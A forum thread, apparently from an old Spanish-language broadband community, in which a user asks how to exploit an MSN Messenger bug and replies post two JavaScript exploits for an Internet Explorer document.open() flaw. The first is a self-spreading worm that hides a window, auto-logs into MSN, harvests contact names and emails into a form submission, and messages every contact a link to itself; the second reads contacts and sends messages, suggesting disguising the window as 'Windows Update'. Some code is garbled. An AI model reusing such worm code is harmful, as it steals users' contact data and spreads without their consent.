Banda Ancha EU

Comunidad de usuarios
de fibra, móvil y ADSL

hosting en interdominios
155 lecturas y 5 respuestas
  • Cerrado

    Hola a todos..bug Msn?

    Hola a todos.. me alegro que haya revivido este foro, a pesar de el cambio de la pagina.. saludos a hypnosis y xenoc los padres de este asunto... bueno al grano.. quisiera saber si existe algun bug del msn y como explotarlo?.. gracias...
    UfOlO
    XD

    Este tema es antiguo y puede contener información obsoleta. Abre un nuevo tema para publicar tu mensaje.
    • Cerrado

      [Editado]

      Hay un error q es bastante conocido ahora (y creo q se…

      Hay un error q es bastante conocido ahora (y creo q se mencionó en este site) sobre una vulnerabilidad del IE q afecta al MSN messenger q puede ser utilizado por worms para exploitiarlo.
      La cuestión es ésta: por medio del IE podés hacer q el MSN envíe un mensaje a toda la lista de usuarios.
      Si rumiamos esto, se puede llegar a la simple conclusión: si en el mensaje ése le mandamos el link de ésa misma página infecta, se va a propagar todo el tiempo cada vez q uno vea la página embedded con el lindo exploit! :-D

      Obviamente esto es gracias otra vez a la genial invención del javascript (q en realidad lo único q tiene de java es el nombre...).
      Acá va el exploit:

      [body onload="Go()"]
      [script]

      var msnWin;
      var msnList;
      var msgStr = "Visita http://bandaancha.st";
      //var msgStr = "[a href="http://bandaancha.st"]Bandaancha.st[/a] YA!";

      function Go(){

      msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
      msnWin.resizeTo(1, 1);
      msnWin.moveTo(10000, 10000);
      msnWin.document.title = "Cargando...";
      msnWin.document.body.innerHTML = '[object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"][/object][object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"][/object]';
      focus();

      if (msnWin.msnObj1.localState == 1){
      msnWin.msnObj2.autoLogon();
      }
      Contacts();
      Send();
      msnWin.close();
      document.contents.submit();
      }

      function Contacts(){
      msnList = msnWin.msnObj1.list(0);
      document.contents.email.value = msnWin.msnObj1.localLogonName;
      document.contents.subject.value = Date();
      var msnStr = "[br]";

      for (i=0;iif (msnList(i).state >1){
      msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "[br]";
      }

      else{
      msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "[br]";
      }
      }
      document.contents.contentBox.value = msnStr;
      }

      function Send(){
      for (i=0;iif (msnList(i).state >1){
      msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
      }
      }
      }

      [/script]
      ------------[Se termina acá]-------------

      Hay un parche d microsoft pa'esto, pero la última vez q lo chequié, el parche era defectuoso y estaban preparando otro parche para arreglar el primer parche q solucionaba supuestamente ésto. (ay. ay... microsoft. ¿Hasta donde quieres llegar hoy?... :-P )

      PS: Tengan en cuenta q cambié los "><" por "][" (sino no hubiera sido visible, y el script hubiera funcado)

    • Cerrado

      Otro bug q permite el control del messenger ajeno por…

      Otro bug q permite el control del messenger ajeno por completo está basado en el IE también: Es por culpa de la vulnerabilidad Document.Open() del IE.
      Todo por culpa del hermanito IE... :-P (son de la misma familia, o no?)

      El xploit:
      [script type="text/javascript"]
      /*@cc_on @*/
      /*@if (@_jscript_version > 4)@*/
      if (!window.showModalDialog)
      {
      alert("Sorry, this example is IE4+ only.\n\nNon-IE browsers do not have this vulnerability.");
      }
      else
      {
      var msnList;
      var msnWin;
      var msnTimer;
      var attemptAutoLogin;
      // This is the message to send to users
      var msgStr = "Hello, my MSN has just been h4>function msnLoad()
      {
      alert("I'm about to attempt to load MSN.\n\nIf MSN is not already open, this might take a few seconds.");
      msnContainer.innerText = "Loading MSN contacts, please wait...";
      // This is the line that causes it all. Instead of calling window.open, we
      // call document.open - this gets totally round all IE domain security.
      msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
      try
      {
      alert(msnWin.location.href);
      }
      catch(errObj)
      {
      alert("Congratulations, you appear to be patched against this problem.");
      msnWin.close();
      msnReset();
      return false;
      }
      // Resize and move the new window, so its out of sight
      msnWin.resizeTo(1, 1);
      msnWin.moveTo(10000, 10000);
      // You could change "MSN Test" to something like "Windows Update"
      msnWin.document.title = "MSN Test";
      // Load the MSN ActiveX controls in the new window
      msnWin.document.body.innerHTML = '';
      // Get window focus back
      focus();
      // See if we can contact the ActiveX objects
      if (!msnWin.msnObj1)
      {
      alert("Couldn't make contact with the MSN ActiveX object. You might have your IE security settings changed, or have a patched IE.");
      }
      // Check if MSN is offline
      else if (msnWin.msnObj1.localState == 1)
      {
      try {
      // Attempt to automatically login
      msnWin.msnObj2.autoLogon();
      } catch (e) {
      // Couldn't auto-login, so show the login UI
      msnWin.msnObj2.launchLogonUI();
      }
      // Attept to load the contact list every second
      msnTimer = setInterval("try { if (msnWin.msnObj1.localState != 1) { clearInterval(msnTimer); showContacts(); } } catch (e) { msnError(); }", 1000);
      }
      else
      {
      // MSN is logged in, all is fine, show the contacts
      showContacts();
      }
      }
      function showContacts()
      {
      try
      {
      if (msnWin.msnObj1.localState == 1)
      {
      // MSN is offline, show error message
      msnError();
      return false;
      }
      // Set the list object
      msnList = msnWin.msnObj1.list(0);
      // Print the contact list out
      var msnStr = "Online contacts for " + msnWin.msnObj1.localLogonName + ":
      ";
      for (i=0;i 1) msnStr += "Contact " + (i+1) + ": " + msnList(i).FriendlyName + ", state: " + msnList(i).State + ", e-mail: " + msnList(i).LogonName + ' - Send message
      ';
      msnContainer.innerHTML = msnStr + "
      Send message to all contacts";
      // Set button to close contacts when clicked
      msnLoadBtn.innerText = "Close MSN Contacts";
      msnLoadBtn.onclick = msnClose;
      // Update the contacts in 3 seconds
      msnTimer = setTimeout("showContacts()", 3000);
      }
      catch (e)
      {
      // There was a problem showing the contacts, show error
      msnError();
      }
      }
      function msnError()
      {
      // Something has gone wrong, abort!
      alert("Sorry, there was an error showing the contact list.\n\nYou might have closed the MSN Test window, or been logged out of MSN.\n\nClick the \"Load MSN Contacts\" button to try again.");
      msnReset();
      }
      function msnReset()
      {
      // Resets everything back to default
      clearInterval(msnTimer);
      msnWin = null;
      msnLoadBtn.innerText = "Load MSN Contacts";
      msnLoadBtn.onclick = msnLoad;
      msnContainer.innerText = "";
      }
      function sendMsg(contact, prompt)
      {
      // Get the user's friendly name
      var msnUser = msnList(contact).friendlyName;
      // Prompt to send message
      if (!prompt || confirm("This will send a nice message to MSN user \"" + msnUser + "\". Continue?"))
      {
      // This is the line that actually sends the message
      msnList(contact).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
      // Confirm message has been sent
      alert("Message has just been sent to \"" + msnUser + "\".\n\nNo MSN dialogs should have appeared.\n\nThis script could have easily sent the message without\nany interaction from you.");
      }
      }
      function msnSendAll()
      {
      // Sends a message to all contacts
      if (confirm("This will send a nice message to all contacts on your list. Continue?"))
      for (var i=0; i}
      onload = function()
      {
      msnLoadBtn.disabled = false;
      }
      onerror = function()
      {
      alert("Sorry, there was an error in the script.\n\nThis may well be due to your IE security settings - try resetting them to default and trying again.\n\nAlso please check you are running and logged into MSN, using the official MSN client - *NOT* a 3rd party application such as Trillian.");
      }
      onunload = function msnClose()
      {
      // Disable error messages
      onerror = function() { return true; }
      if (msnWin && !msnWin.closed)
      {
      // Clear timer, close window, msnReset
      clearInterval(msnTimer);
      msnWin.close();
      msnReset();
      }
      }
      }
      /*@else @*/
      alert("Sorry, this requires JScript version 5 or better.\n\nIt could be made to work with previous versions, but I'm lazy :D");
      /*@end @*/
      -->
      [/script]

      Descubierto por The Pull